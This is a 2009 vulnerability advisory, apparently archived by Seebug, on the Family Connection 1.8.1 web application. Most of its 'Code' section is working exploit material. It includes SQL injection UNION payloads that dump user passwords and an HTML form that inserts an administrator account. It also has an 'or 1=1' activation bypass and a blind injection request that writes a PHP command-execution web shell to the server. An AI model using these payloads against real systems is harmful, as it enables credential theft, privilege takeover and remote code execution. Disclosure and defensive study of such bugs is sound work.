Family Connection 1.8.1 Multiple Remote Vulnerabilities

ID SSV:10917
Type seebug
Reporter Root
Modified 2009-03-31T00:00:00


No description provided by source.

                                                *******   Salvatore \"drosophila\" Fresta   *******

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website:

[+] Bugs: [A] Multiple SQL Injection
          [B] Create Admin User
          [C] Blind SQL Injection	

[+] Exploitation: Remote
[+] Date: 25 Mar 2009

[+] Discovered by: Salvatore \"drosophila\" Fresta
[+] Author: Salvatore \"drosophila\" Fresta
[+] Contact: e-mail:


[+] Menu

1) Bugs
2) Code
3) Fix


[+] Bugs

- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allows a registered user to view
username and password of all registered users.

- [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php

This bug allow a guest to create an account with
administrator privileges.

- [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php


[+] Code

- [A] Multiple SQL Injection\' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 UNION SELECT 1,2,username,password,5,6 FROM fcms_users UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23

- [B] Create Admin User

    <title>Family Connection 1.8.1 Create Admin User Exploit</title>
    <p>This exploit creates an user with administrator privileges using follows information:<br>
       Username: root<br>
       Password: toor<br>
    <form action=\"http://localhost/fcms/register.php\" method=\"POST\">
      <input type=\"hidden\" name=\"username\" value=\"blabla\">
      <input type=\"hidden\" name=\"password\" value=\"blabla\">
      <input type=\"hidden\" name=\"email\" value=\"blabla@blabla.blabla\">
      <input type=\"hidden\" name=\"fname\" value=\"blabla\">
      <input type=\"hidden\" name=\"lname\" value=\"blabla\">
      <input type=\"hidden\" name=\"year\" value=\"00-00-000\',\'fakeuser\',\'fakepassword\'), (1, NOW(), \'root\', \'root\', \'\', \'00-00-00\', \'root\', \'7b24afc8bc80e548d66c4e7ff72171c5\')#\'\">
      <input type=\"submit\" name=\"submit\" value=\"Exploit\">

To activate accounts: or 1=1&code=

[C] Blind SQL Injection

POST /path/lostpw.php HTTP/1.1\\r\\n\"
Content-Type: application/x-www-form-urlencoded\\r\\n\"
Content-Length: 193\\r\\n\\r\\n\"
email=-1\' UNION ALL SELECT \'<?php echo \"<pre>\"; system($_GET[cmd]); echo \"</pre><br><br>\";?>\',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE \'/var/www/htdocs/path/rce.php\'#

To execute commands:


[+] Fix

No fix.